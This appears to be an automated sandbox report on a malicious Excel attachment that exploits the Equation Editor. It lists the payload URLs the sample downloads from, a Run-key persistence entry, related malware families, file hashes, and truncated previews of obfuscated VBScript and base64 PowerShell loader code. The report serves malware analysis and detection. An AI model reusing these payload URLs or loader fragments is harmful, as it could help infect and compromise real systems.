http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://blessy.ydns.eu/jimbo/prnportjjm.vbsj	0%	Avira URL Cloud	safe
https://uploaddeimagens.com.br/images/00	0%	Avira URL Cloud	safe
https://lesferch.github.io/DesktopPic	0%	Avira URL Cloud	safe
http://blessy.ydns.eu/jimbo/prnportjjm.vbs	100%	Avira URL Cloud	malware
https://uploaddeimagens.com.br	0%	Avira URL Cloud	safe
https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820	0%	Avira URL Cloud	safe
http://blessy.ydns.eu/jimbo/prnportjjm.vbsoP	0%	Avira URL Cloud	safe
http://blessy.ydns.eu/jimbo/prnportjjm.vbsooC:	0%	Avira URL Cloud	safe
https://uploaddeimagens.com.br	7%	Virustotal		Browse
https://lesferch.github.io/DesktopPic	0%	Virustotal		Browse
http://blessy.ydns.eu/jimbo/prnportjjm.vbsD	0%	Avira URL Cloud	safe
https://uploaddeimagens.com.br/images/00	3%	Virustotal		Browse
https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820	14%	Virustotal		Browse
http://blessy.ydns.eu/jimbo/prnportjjm.vbs	4%	Virustotal		Browse
http://blessy.ydns.eu/jimbo/prnportjjm.vbsj	4%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ajai.ydns.eu	23.226.132.239	true	false	3%, Virustotal, Browse	unknown
blessy.ydns.eu	5.182.211.151	true	true	2%, Virustotal, Browse	unknown
uploaddeimagens.com.br	172.67.215.45	true	true	7%, Virustotal, Browse	unknown
pastebin.com	104.20.4.235	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://blessy.ydns.eu/jimbo/prnportjjm.vbs	true	4%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://pastebin.com/raw/yk0CXsC5	false		high
https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820	true	14%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000008.00000002.441662069.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.entrust.net/server1.crl0	wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.entrust.net03	wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000008.00000002.441662069.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000008.00000002.441662069.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://blessy.ydns.eu/jimbo/prnportjjm.vbsj	EQNEDT32.EXE, 00000002.00000002.401357006.0000000003560000.00000004.00000020.00020000.00000000.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://pastebin.com/Th	wscript.exe, 00000005.00000003.408684825.000000000094B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406824919.0000000000946000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409421374.000000000094B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://uploaddeimagens.com.br/images/00	powershell.exe, 00000008.00000002.446551677.00000000050AF000.00000004.00000020.00020000.00000000.sdmp	true	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://lesferch.github.io/DesktopPic	wscript.exe, 00000005.00000002.409494402.0000000001FB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.408090678.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, prnportjjm[1].vbs.2.dr, prnport.vbs.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://uploaddeimagens.com.br	powershell.exe, 00000008.00000002.441662069.00000000027BA000.00000004.00000800.00020000.00000000.sdmp	true	7%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000008.00000002.441662069.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000008.00000002.441662069.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://blessy.ydns.eu/jimbo/prnportjjm.vbsoP	EQNEDT32.EXE, 00000002.00000002.401009670.00000000005AE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blessy.ydns.eu/jimbo/prnportjjm.vbsooC:	EQNEDT32.EXE, 00000002.00000002.401009670.00000000005AE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net0D	wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000006.00000002.521632788.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.441662069.0000000002681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.436029460.0000000002681000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.comodo.com/CPS0	wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://pastebin.com/Sh	wscript.exe, 00000005.00000003.408684825.000000000094B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406824919.0000000000946000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409421374.000000000094B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	wscript.exe, 00000005.00000003.406363679.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.406259857.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.409672708.0000000003EB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.446551677.00000000050CE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://blessy.ydns.eu/jimbo/prnportjjm.vbsD	EQNEDT32.EXE, 00000002.00000002.401009670.00000000005AE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.19.24	unknown	United States	13335	CLOUDFLARENETUS	true
5.182.211.151	blessy.ydns.eu	Netherlands	64425	SKB-ENTERPRISENL	true
172.67.215.45	uploaddeimagens.com.br	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1430780
Start date and time:	2024-04-24 07:31:23 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	xF3wienia PO2102559-1.xlsx
Detection:	MAL
Classification:	mal100.spre.troj.expl.evad.winXLSX@12/15@10/3
EGA Information:	Successful, ratio: 25%
HCA Information:	Successful, ratio: 100% Number of executed functions: 21 Number of non-executed functions: 9
Cookbook Comments:	Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
Execution Graph export aborted for target powershell.exe, PID 3160 because it is empty
Execution Graph export aborted for target powershell.exe, PID 3248 because it is empty
Execution Graph export aborted for target powershell.exe, PID 3476 because it is empty
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:32:34	API Interceptor	70x Sleep call for process: EQNEDT32.EXE modified
07:32:37	API Interceptor	107x Sleep call for process: wscript.exe modified
07:32:40	API Interceptor	313x Sleep call for process: powershell.exe modified
22:32:56	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\word.vbs
22:33:04	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\word.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
172.67.19.24	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
	SecuriteInfo.com.Win64.TrojanX-gen.11161.10776.exe	Get hash	malicious	AsyncRAT, DcRat	Browse
	c3nBx2HQG2.exe	Get hash	malicious	Glupteba, Mars Stealer, Phorpiex, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
	jNeaezBuo8.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
	F723838674.vbs	Get hash	malicious	Remcos	Browse
	SecuriteInfo.com.Win64.CrypterX-gen.2144.26023.exe	Get hash	malicious	Glupteba, PureLog Stealer, zgRAT	Browse
172.67.215.45	Reconfirm Details.vbs	Get hash	malicious	AgentTesla	Browse
	72625413524.vbs	Get hash	malicious	XWorm	Browse
	Purchase Inquiry.vbs	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf	Get hash	malicious	Remcos	Browse
	Invoice No. 03182024.docx	Get hash	malicious	Remcos	Browse
	Payment Advice for Invoice 2024 0904.vbs	Get hash	malicious	FormBook	Browse
	TNT Invoicing_pdf.vbs	Get hash	malicious	FormBook	Browse
	DHL Shipping Documents_pdf.vbs	Get hash	malicious	AgentTesla	Browse
	P.O.109961.xls	Get hash	malicious	Remcos	Browse
	SecuriteInfo.com.Exploit.ShellCode.69.24616.9282.rtf	Get hash	malicious	Remcos	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
pastebin.com	SecuriteInfo.com.Win64.TrojanX-gen.11161.10776.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	172.67.19.24
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	104.20.3.235
	03Eq3aGlTA.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	104.20.4.235
	jmud48R9xn.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	104.20.4.235
	1fB6XLksfA.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	104.20.3.235
	6JdScgXGyI.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	104.20.3.235
	KVOCdfsgdi.exe	Get hash	malicious	RedLine	Browse	104.20.4.235
	0OqTUkeaoD.exe	Get hash	malicious	RedLine	Browse	104.20.3.235
	F723838674.vbs	Get hash	malicious	Remcos	Browse	172.67.19.24
	Cheater Pro 1.6.0.msi	Get hash	malicious	Unknown	Browse	104.20.3.235
uploaddeimagens.com.br	orden de compra.vbs	Get hash	malicious	AgentTesla	Browse	104.21.45.138
	Reconfirm Details.vbs	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	gmb.xls	Get hash	malicious	Unknown	Browse	104.21.45.138
	72625413524.vbs	Get hash	malicious	XWorm	Browse	172.67.215.45
	Purchase Inquiry.vbs	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	bZA95up38s.rtf	Get hash	malicious	AgentTesla	Browse	104.21.45.138
	SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf	Get hash	malicious	Remcos	Browse	172.67.215.45
	SecuriteInfo.com.Win32.SuspectCrc.28876.20318.xlsx	Get hash	malicious	AgentTesla	Browse	104.21.45.138
	Invoice No. 03182024.docx	Get hash	malicious	Remcos	Browse	172.67.215.45
	eInvoicing_pdf.vbs	Get hash	malicious	FormBook	Browse	104.21.45.138

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SKB-ENTERPRISENL	7VzdKNO227.exe	Get hash	malicious	Unknown	Browse	45.148.121.112
	BKM.exe	Get hash	malicious	CobaltStrike	Browse	45.148.122.171
	a5m1dsUj0A.elf	Get hash	malicious	Unknown	Browse	45.148.122.89
	https://bonus-fortune@wa0.ru/tigers/?Participe	Get hash	malicious	HTMLPhisher	Browse	45.148.121.53
	TWZULzcfll.elf	Get hash	malicious	Unknown	Browse	45.148.122.89
	SecuriteInfo.com.Linux.Mirai.2001.19678.11359.elf	Get hash	malicious	Unknown	Browse	45.148.122.89
	Z0vHHT5R55.elf	Get hash	malicious	Unknown	Browse	45.148.122.89
	e25KLXn2ym.elf	Get hash	malicious	Unknown	Browse	45.148.122.89
	jew.arm7.elf	Get hash	malicious	Unknown	Browse	45.148.122.89
	jew.x86.elf	Get hash	malicious	Unknown	Browse	45.148.122.89
CLOUDFLARENETUS	F#U0130YAT TEKL#U0130F.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	104.26.12.205
	http://damarltda.cl/certificado.php	Get hash	malicious	Unknown	Browse	162.159.61.3
	New Order - DUBAI BURJ KHALIFA LLC - PRICE ENQUIRY - RFQ 60000764690.xla.xlsx	Get hash	malicious	Unknown	Browse	172.67.206.230
	Payment MT103.xls	Get hash	malicious	Unknown	Browse	172.67.206.230
	#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe	Get hash	malicious	GuLoader, Remcos	Browse	104.21.60.38
	New DHL Shipment Document Arrival Notice.pdf.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	hesaphareketi_1.scr.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Payment MT103.xls	Get hash	malicious	Unknown	Browse	104.21.15.201
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	New Order .doc	Get hash	malicious	Unknown	Browse	172.67.134.136
CLOUDFLARENETUS	https://tibusiness.cl/css/causarol.rar	Get hash	malicious	Unknown	Browse	1.1.1.1
	F#U0130YAT TEKL#U0130F.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	104.26.12.205
	http://damarltda.cl/certificado.php	Get hash	malicious	Unknown	Browse	162.159.61.3
	New Order - DUBAI BURJ KHALIFA LLC - PRICE ENQUIRY - RFQ 60000764690.xla.xlsx	Get hash	malicious	Unknown	Browse	172.67.206.230
	Payment MT103.xls	Get hash	malicious	Unknown	Browse	172.67.206.230
	#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe	Get hash	malicious	GuLoader, Remcos	Browse	104.21.60.38
	New DHL Shipment Document Arrival Notice.pdf.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	hesaphareketi_1.scr.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Payment MT103.xls	Get hash	malicious	Unknown	Browse	104.21.15.201
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	HFiHWvPsvA.rtf	Get hash	malicious	Remcos, DBatLoader	Browse	172.67.215.45
	New order-Docs0374.xls	Get hash	malicious	Unknown	Browse	172.67.215.45
	gmb.xls	Get hash	malicious	Unknown	Browse	172.67.215.45
	scripttodo.ps1	Get hash	malicious	Unknown	Browse	172.67.215.45
	payment swift.xls	Get hash	malicious	Remcos, DBatLoader	Browse	172.67.215.45
	bZA95up38s.rtf	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf	Get hash	malicious	Remcos	Browse	172.67.215.45
	SecuriteInfo.com.Win32.SuspectCrc.28876.20318.xlsx	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	Invoice No. 03182024.docx	Get hash	malicious	Remcos	Browse	172.67.215.45
	2020.xls	Get hash	malicious	Remcos, DBatLoader	Browse	172.67.215.45
7dcce5b76c8b17472d024758970a406b	New Order - DUBAI BURJ KHALIFA LLC - PRICE ENQUIRY - RFQ 60000764690.xla.xlsx	Get hash	malicious	Unknown	Browse	172.67.19.24
	Payment MT103.xls	Get hash	malicious	Unknown	Browse	172.67.19.24
	New Order .doc	Get hash	malicious	Unknown	Browse	172.67.19.24
	Remittance-Advice.doc	Get hash	malicious	Unknown	Browse	172.67.19.24
	shipping docs.doc	Get hash	malicious	Unknown	Browse	172.67.19.24
	Invoice.doc	Get hash	malicious	AgentTesla	Browse	172.67.19.24
	Gam.xls	Get hash	malicious	Unknown	Browse	172.67.19.24
	Invoice.doc	Get hash	malicious	Unknown	Browse	172.67.19.24
	Gam.xls	Get hash	malicious	Unknown	Browse	172.67.19.24
	New order-Docs0374.xls	Get hash	malicious	Unknown	Browse	172.67.19.24

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Non-ISO extended-ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	204105
Entropy (8bit):	5.165709687166053
Encrypted:	false
SSDEEP:	3072:A1yO1lQ014CTt1ns3wflGsZcfo0QA5PGpb8h0:A191lF1rflGsZcfu
MD5:	9D7684F978EBD77E6A3EA7EF1330B946
SHA1:	3FA2D2963CBF47FFD5F7F5A9B4576F34ED42E552
SHA-256:	6C96E976DC47E0C99B77814E560E0DC63161C463C75FA15B7A7CA83C11720E82
SHA-512:	496EC0BA2EEA98355F18201E9021748AB32DE7E5996C54D9C5C4AFBE34B1C7CD2F50E05EC50F2C552E04E121BEDFFED6234ED111C25FC7A2454B33A1D6C55D6F
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	'..' Copyright (c) Microsoft Corporation. All rights reserved...'..' VBScript Source File..'..' Script Name: winrm.vbs..'....Option Explicit....'''''''''''''''''''''..' Error codes..private const ERR_OK = 0..private const ERR_GENERAL_FAILURE = 1....'''''''''''''''''''''..' Messages..private const L_ONLYCSCRIPT_Message = "Can be executed only by cscript.exe."..private const L_UNKOPNM_Message = "Unknown operation name: "..private const L_OP_Message = "Operation - "..private const L_NOFILE_Message = "File does not exist: "..private const L_PARZERO_Message = "Parameter is zero length #"..private const L_INVOPT_ErrorMessage = "Switch not allowed with the given operation: "..private const L_UNKOPT_ErrorMessage = "Unknown switch: "..private const L_BLANKOPT_ErrorMessage = "Missing switch name"..private const L_UNKOPT_GenMessage = "Invalid use of command line. Type ""winrm -?"" for help."..private const L_HELP_GenMessage

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	4760
Entropy (8bit):	4.831175347448903
Encrypted:	false
SSDEEP:	96:ACJ2Woe5v2k6Lm5emmXIGbgyg12jDs+un/iQLEYFjDaeWJ6KGcmXoFRLcU6/KD:vxoe5vVsm5emdkgkjDt4iWN3yBGHUdcY
MD5:	A50F0B3600A83789D28B424D69626266
SHA1:	0183DA34933788FF97602C9DEA82F39CAD0697C2
SHA-256:	7B188A9EEAC0649E088208C137625F64175EDAC8AE7F25D8A0F8B5611C824A8A
SHA-512:	335DCAA6FE83BC0F492B353C036EA2A5CA52ECE628520A3E50BAF7C373D4CDBAC7585341D91D9B210C3EC4378525AA934CCB5BB418C4D776105FBB59F4873216
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE......%+./...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........%+./...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\prnportjjm[1].vbs

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (771), with CRLF line terminators
Category:	dropped
Size (bytes):	114106
Entropy (8bit):	3.7167517865088318
Encrypted:	false
SSDEEP:	1536:jOwLNU1lBHFcJUJI+YZb5bJ9Gmgz/+rtfRDFqGb5uJZUU0tKl9CP8Z:jdNU1DHFUGmgURDFBe0tKl9CP4
MD5:	7BCEAB89E17A21D13720A0B9F0477184
SHA1:	4F319FFBFAEFA545C663959E03879B338D85E99E
SHA-256:	40BDA6D4FE2BC514FBAC94B03A44F18A4984496BC2218C27F1A5880E28913B04
SHA-512:	54363E5A6C1DD77E8C147F88794CC0EA1419639214E4AD6D1830A6C129E9114A2F5449E25BEFE6E83AB30CDDD27A1DEC2DFA7ED5092E228F2C8B96ABE25C58BE
Malicious:	true
Preview:	......'.....c.o.n.s.t. .c.o.b.r.a.n.c.i.s.t.a. . . . . . . . . . .=. .0.....c.o.n.s.t. .k.A.c.t.i.o.n.D.e.l.e.t.e. . . . . . . .=. .1.....c.o.n.s.t. .k.A.c.t.i.o.n.L.i.s.t. . . . . . . . . .=. .2.....c.o.n.s.t. .p.e.d.e.r.n.a.l. . . . . . .=. .3.....c.o.n.s.t. .e.s.p.e.r.t.a.m.e.n.t.e. . . . . . . . . . .=. .4.....c.o.n.s.t. .m.a.t.a.d.o.i.r.o. . . . . . . . . . .=. .5.........c.o.n.s.t. .a.l.l.a.m.a.n.d.a. . . . . . . .=. .0.....c.o.n.s.t. .K.E.r.r.o.r.F.a.i.l.u.r.e. . . . . . . .=. .1.........c.o.n.s.t. .k.F.l.a.g.C.r.e.a.t.e.O.r.U.p.d.a.t.e. .=. .0.........c.o.n.s.t. .m.o.d.e.r.n.a.d.a.m.e.n.t.e. . . . . . . . . . .=. .".r.o.o.t.\.c.i.m.v.2.".............'.....'. .C.o.n.s.t.a.n.t.s. .f.o.r. .t.h.e. .p.a.r.a.m.e.t.e.r. .d.i.c.t.i.o.n.a.r.y.....'.....c.o.n.s.t. .f.e.r.n.a.n.d.i.n.a. . . . . . .=. .1.....c.o.n.s.t. .f.a.g.u.e.i.r.o. . . . . . . . .=. .2.....c.o.n.s.t. .k.D.o.u.b.l.e.S.p.o.o.l. . . . . .=. .3.....c.o.n.s.t. .k.P.o.r.t.N.u.m.b.e.r. . . . . . .=. .4.....c.o.n.s.t. .k.P.o.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\yk0CXsC5[1].txt

Download File

Process:	C:\Windows\SysWOW64\wscript.exe
File Type:	Unicode text, UTF-8 text, with very long lines (11670), with CRLF line terminators
Category:	dropped
Size (bytes):	13650
Entropy (8bit):	4.759486578804788
Encrypted:	false
SSDEEP:	384:OBcZBPV6Wp/pRvHGMbgd+mgGG5yY3DPpGH+oiRIPVpPgRtVNRbdIA9dQ:dVTJHvHZgg3GGkY3DPpVj0VIzuP
MD5:	777CF58F3010B40FB48DCB30C9F3C330
SHA1:	CACD06BC5A5E53E36BEBE2745B3766AF482CA949
SHA-256:	D3387FC20D2942A01A27C4E7FF1D6EDAA25E4DE13706601F5ECEF3AA169729D2
SHA-512:	DB04F6D25E720D510032D06B9A4A7422F505BA85AA227D8D8EF8F87B875EA756A893AB9277762EDBFAEE93EC6229539AA5153B5208CA288EBD17E638E12A28E3
Malicious:	false
Preview:	.. dim ouvisto , gracioso , buama , presidencial , dividir , Cama , dividir1.. gracioso = " ".. buama = "" & presidencial & gracioso & presidencial & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTre" & presidencial & gracioso & presidencial & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTre" & presidencial & gracioso & presidencial & "QB3DgTreC0DgTreTwBiDgTreGoDgTre" & presidencial & gracioso & presidencial & "QBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTre" & presidencial & gracioso & presidencial & "QB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTre" & presidencial & gracioso & presidencial & "QBuDgTreHQDgTreOwD

C:\Users\user\AppData\Local\Temp\2env224q.jgi.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
